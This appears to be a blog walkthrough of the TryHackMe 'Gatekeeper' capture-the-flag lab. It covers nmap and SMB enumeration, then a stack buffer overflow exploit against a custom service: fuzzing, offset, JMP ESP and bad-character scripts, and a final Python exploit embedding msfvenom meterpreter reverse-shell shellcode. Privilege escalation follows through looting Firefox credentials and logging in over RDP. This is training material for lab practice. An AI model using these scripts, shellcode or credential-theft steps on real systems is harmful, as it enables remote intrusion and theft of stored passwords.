Gatekeeper - Buffer Overflow

-

Note: due to restarting of machine, you may see different IPs

1. Scanning 


-sV =  Service Version, if an open port is found, it will detect that which service is running on that.
-A = All information like running services versions, OS version and...
-T4 = speed
-oN or -o = Outputs the result in namp_scan file
-v = while scanning is running you are seeing the result line by line

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# cat nmap_scan
# Nmap 7.80 scan initiated Fri Aug 14 04:32:54 2020 as: nmap -sV -A -T4 -oN nmap_scan -v 10.10.15.170
Nmap scan report for 10.10.5.157
Host is up (0.17s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello

|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=8/14%Time=5F361409%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r
SF:rOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2eba
SF:k\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01de
SF:fault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n"
SF:);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:=N%T=80%CD=Z)

Uptime guess: 0.008 days (since Fri Aug 14 04:25:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:af:47:af:7a:ab (unknown)
| Names:
|   GATEKEEPER<00>       Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   GATEKEEPER<20>       Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-14T00:35:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-14T04:35:56
|_  start_date: 2020-08-14T04:26:12

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   213.37 ms 10.11.0.1
2   213.71 ms 10.10.15.170

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 14 04:37:10 2020 -- 1 IP address (1 host up) scanned in 256.25 seconds

--------------

While scanning is running, I will do a basic nmap scan to check only for the open ports 



whenever you see 139, 445 ports open it means that the SMB services are running so start enumerating and see which folders are shared.
 
------------------------------------------

2. enumerate smb shared folders

 -L = list all the shared folders
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient  -L 10.10.15.170
 
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient //10.10.15.170/Users
$ dir 

Goto- Share
download the gatekeeper.exe 
get gatekeeper.exe
$ quite

check your root directory the exe file will be there or search it 
# locate gatekeeper.exe

---------------------------------------

3. Copy&paste the gatekeeper.exe in your windows OS

copy and paste 
or create a python server where your exe file is
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python -m SimpleHTTPServer 



Download it in your Windows OS



--------------------------------

4. Run immunity debugger as administrator 

and open gatekeeper.exe
Play




Check if we can communicate with the application running on our windows machine
this is also called spiking.

It shows that 3 bytes of data have been received


 ---------------------------------------


5. Fuzzing / identification of the vulnerability 

Our fuzzing script. 1_fuzzing.py

import socket

10 to 200, with increments of 10.
counter = 10
fuzz_strings = ["A"]

while len(fuzz_strings) <= 30:
    fuzz_strings.append("A" * counter)
    counter = counter + 10

for fuzz in fuzz_strings:
    print "Fuzzing with %s bytes" % len(fuzz)
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('192.168.45.153', 31337))
    s.send(fuzz + '\r\n\r\n' )
    
    print s.recv(1024)
    s.close()

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 1_fuzzing .py 

It shows that after 150 bytes of data, the fuzzing stopped. 
If we are not wrong the size of buffer is 146 + EIP which is 4 bytes that is equal to 150 bytes. 
We have crushed the service with 150 bytes of As



but we still don't know the exact size of buffer which is also called offset that is between 1 to 150. so let's find it with the help of msf.

-----------------------------------

6. finding offset (From the beginning of buffer upto EIP)  exact size of buffer

First create a pattern of 150 bytes
# msf-pattern_create -l 150

Then when you have runned your python script, copy the value from EIP  
# msf-pattern_offset -q (value from EIP)

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 2_finding_EiP.py
import socket


attern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
p

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(pattern + '\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
	print "Could not connect"  


Check the application status in debugger which is crushed.  Copy the value of EIP which is 3956138.


This is how we create pattern and check the exact size of the buffer

It shows that the buffer size is 146

----------------------------------

7. find JMP ESP 

Find a JMP ESP instruction from a DLL that has no ASLR (Address space layout randomization). 

To see all the modules in gatekeeper application type

!mona modules  


To find the JMP ESP pointers in gatekeeper.exe module type
!mona find -s "\xff\xe4" -m gatekeeper.exe

ff is the opcode of JMP 
e4 is the opcode of ESP
How did we know that its the Operation Code (opcode) of JMP and ESP?


Ok so we have only two pointers in this module

we have 2 addresses which have ASLR and SEH protection off.

write the address in little-endian format

080416BF = b"\xBF\x16\x04\x08"

080414C3 = b"\xC3\x14\x04\x08".

After finding the modules click on any of those two addresses and this screen will appear. right-click on the address --> Breakpoint --> Toggle
you will see that highlighted. 


The purpose of setting a toggle is to check if we can hit that address or not so that we can put our payload there.

------------------------------

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b'A' * 146 + b"\xC3\x14\x04\x08"
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + '\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
    print "Could not connect"

   so it means that we hit the address we wanted to.

-------------------------

8. find the bad characters


Find badchars with Mona

Type below command and it creates two files where your 

debugger and monna is installed.



file 1: bytearray.txt
file 2: bytearray.bin
!mona bytearray -b "\x00"

    


open bytearray.txt file and copy the badchars and paste it in your python script.
you can also find the bad characters by googling.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = b"A" * 146 + b"B" * 4 + badchars
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + '\r\n\r\n')
    s.close()
    print "\nDone!"
except:
    print "Could not connect"
4_finding_badchars.py

005519F8  is stack pointer

!mona compare -f bytearray.bin -a 005519F8
Possibly bad chars: 00 0a


so we found that the badchars are 00, 0a so we must exclude that from our payload.

Manually finding of badchars:
             
If you see any of these three things so it means that its a badchar:
1. Break of flow like: (1,2,5,4,3,6,7,8,9)
2. Repeatative like: (1,2,2,3,4,5,6,7,8,9)
3. Completely removed: (the characters won't be shown at all) 1,2,3,5,6,7,8,9

-----------------------------

9. create shellcode 

we put the the 

!msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.12.255 LPORT=443 -b "\00\0a" -f python --var-name shellcode

Output of msfvenom

------------------------------

10. open listener in Metasploit


Run the python script

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.11.12.255 LPORT=443 -f py-b "\x00\x0a" --var-name shellcode

shellcode =  b""
shellcode += b"\xdd\xc2\xd9\x74\x24\xf4\xbe\x7b\x43\xab\xc2"
shellcode += b"\x5a\x2b\xc9\xb1\x56\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x6f\xa1\x5e\x3e\x67\xa7\xa1\xbf\x77"
shellcode += b"\xc8\x28\x5a\x46\xc8\x4f\x2e\xf8\xf8\x04\x62"
shellcode += b"\xf4\x73\x48\x97\x8f\xf6\x45\x98\x38\xbc\xb3"
shellcode += b"\x97\xb9\xed\x80\xb6\x39\xec\xd4\x18\x00\x3f"
shellcode += b"\x29\x58\x45\x22\xc0\x08\x1e\x28\x77\xbd\x2b"
shellcode += b"\x64\x44\x36\x67\x68\xcc\xab\x3f\x8b\xfd\x7d"
shellcode += b"\x34\xd2\xdd\x7c\x99\x6e\x54\x67\xfe\x4b\x2e"
shellcode += b"\x1c\x34\x27\xb1\xf4\x05\xc8\x1e\x39\xaa\x3b"
shellcode += b"\x5e\x7d\x0c\xa4\x15\x77\x6f\x59\x2e\x4c\x12"
shellcode += b"\x85\xbb\x57\xb4\x4e\x1b\xbc\x45\x82\xfa\x37"
shellcode += b"\x49\x6f\x88\x10\x4d\x6e\x5d\x2b\x69\xfb\x60"
shellcode += b"\xfc\xf8\xbf\x46\xd8\xa1\x64\xe6\x79\x0f\xca"
shellcode += b"\x17\x99\xf0\xb3\xbd\xd1\x1c\xa7\xcf\xbb\x48"
shellcode += b"\x04\xe2\x43\x88\x02\x75\x37\xba\x8d\x2d\xdf"
shellcode += b"\xf6\x46\xe8\x18\x8f\x41\x0b\xf6\x37\x01\xf5"
shellcode += b"\xf7\x47\x0b\x32\xa3\x17\x23\x93\xcc\xfc\xb3"
shellcode += b"\x1c\x19\x68\xbe\x8a\xa8\x67\xb2\xb5\xc5\x75"
shellcode += b"\xca\x48\xad\xf0\x2c\x1a\x81\x52\xe1\xdb\x71"
shellcode += b"\x12\x51\xb4\x9b\x9d\x8e\xa4\xa3\x74\xa7\x4f"
shellcode += b"\x4c\x20\x9f\xe7\xf5\x69\x6b\x99\xfa\xa4\x11"
shellcode += b"\x99\x71\x4c\xe5\x54\x72\x25\xf5\x81\xe5\xc5"
shellcode += b"\x05\x52\x80\xc5\x6f\x56\x02\x92\x07\x54\x73"
shellcode += b"\xd4\x87\xa7\x56\x67\xcf\x58\x27\x51\xbb\x6f"
shellcode += b"\xbd\xdd\xd3\x8f\x51\xdd\x23\xc6\x3b\xdd\x4b"
shellcode += b"\xbe\x1f\x8e\x6e\xc1\xb5\xa3\x22\x54\x36\x95"
shellcode += b"\x97\xff\x5e\x1b\xc1\xc8\xc0\xe4\x24\x4b\x06"
shellcode += b"\x1a\xba\x64\xaf\x72\x44\x35\x4f\x82\x2e\xb5"
shellcode += b"\x1f\xea\xa5\x9a\x90\xda\x46\x31\xf9\x72\xcc"
shellcode += b"\xd4\x4b\xe3\xd1\xfc\x0a\xbd\xd2\xf3\x96\x4e"
shellcode += b"\xa8\x7c\x28\xaf\x4d\x95\x4d\xb0\x4d\x99\x73"
shellcode += b"\x8d\x9b\xa0\x01\xd0\x1f\x97\x1a\x67\x3d\xbe"
shellcode += b"\xb0\x87\x11\xc0\x90"



offset = 146
address = b"\xC3\x14\x04\x08"  #JMP ESP address 080414C3
payload = "A" * offset + address + b"\x90" * 16 + shellcode + "B" * 100
try:
    print "\nSending payload..."
    s.connect(('10.10.107.92', 31337))
    s.send(payload + '\r\n\r\n')
    print "\nDone!."
except:
    print "Could not connect"

 5_Shellcode.py



we got meterpreter

--------------------------------

11. First flag  --> cat user.txt.taxt


----------------------------------------------------------------

12. Privilege Escalation

Let's Enumerate Applications:


Enumerate firefox


    four files downloaded in /root/.msf4/loot/

Donwloaded files


Before renaming

--------------------------------------


13. download firefox decryptor tool

https://github.com/unode/firefox_decrypt

git clone https://github.com/unode/firefox_decrypt.git

--------------------------------

14. Rename the previous 4 downloaded files to its original names

thunar /root/.msf4/loot/

 1. cert9.db  

 2. cookies.sqlite

 3. key4.db

 4. logins.jason

     After Renaming to thier original names.

----------------------------------

15. run firefox_decryptor 

python firefox_decrypt.py /root/.msf4/loot/

--------------------------------

16. Connect to RDP 

xfreerdp /u:mayor /p:8CL.... /v:10.10.43.204


Final flag



Comments

Post a Comment

Popular posts from this blog

Solving Computer Forensics Case Using Autopsy

-
Image
  Computer Forensics is the well-planned series of procedures and techniques used for obtaining evidence from computer systems and storage media. This evidence can then be analyzed for relevant information that is to be presented in a court of law. This article focused on a particular case and a forensic tool to give you a ‘feel’ of what computer forensics investigations are like. However, it is in no way comprehensive enough to cover the variety of problems and complications faced by the investigator.   Scenario  A complaint was made to the authorities describing alleged Wi-Fi hacking activity. When the authorities reached the spot, they found an abandoned Dell computer which is suspected that this computer was used for hacking purposes. Schardt uses "Mr.Evil" nickname when he goes online. He is also accused of parking his car in wireless range (like Starbucks and other T-Mobile Hotspots) where he would then intercept internet traffic, attempting to get credit card numb...
Read more

Pentesting - Exploitation Guide Metasploitable 1

-
Image
Metasploitable Metasploitable is an Ubuntu 8.04 server installed on a VMWare 6.5 image with a number of vulnerable packages included, which can be run on most virtualization software. You can grab your copy at Vulnhub – Metasploitable I used Kali Linux for attacking and VirtualBox for virtualization. Information Gathering nmap is a great tool for scanning ports and finding network services on a machine. We will run nmap with the following options: -sV to probe open ports for service and version info -O to fingerprint and try to guess the operating system -p1-65535 to do a complete port scan root@kali:~# nmap -sV -O 192.168.0.14 -p1-65535 Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-12 16:46 MDT Nmap scan report for 192.168.0.14 Host is up (0.00073s latency). Not shown: 65522 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.1 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open...
Read more

The Main Cyber Threats Facing the Aviation Industry

-
Image
  Introduction The aviation industry, one of the most critical sectors in global transportation, is heavily dependent on interconnected technologies, which also makes it a lucrative target for cybercriminals. With each advancement in technology, there comes a new set of cyber risks that threaten the confidentiality, integrity, and availability of essential systems in the aviation ecosystem. The consequences of cyberattacks on the aviat ion industry can be catastrophic, ranging from flight delays to data breaches, physical harm to passengers, and even financial devastation for airlines and airports. As technology continues to evolve in aviation, so too do the cybersecurity challenges. In this comprehensive blog, we will explore the major cyber threats in the aviation industry and dive into best practices, standards, and risk assessments to mitigate these threats. 1. Overview of Cyber Threats in Aviation The aviation industry is complex, involving many interdependent systems such as ...
Read more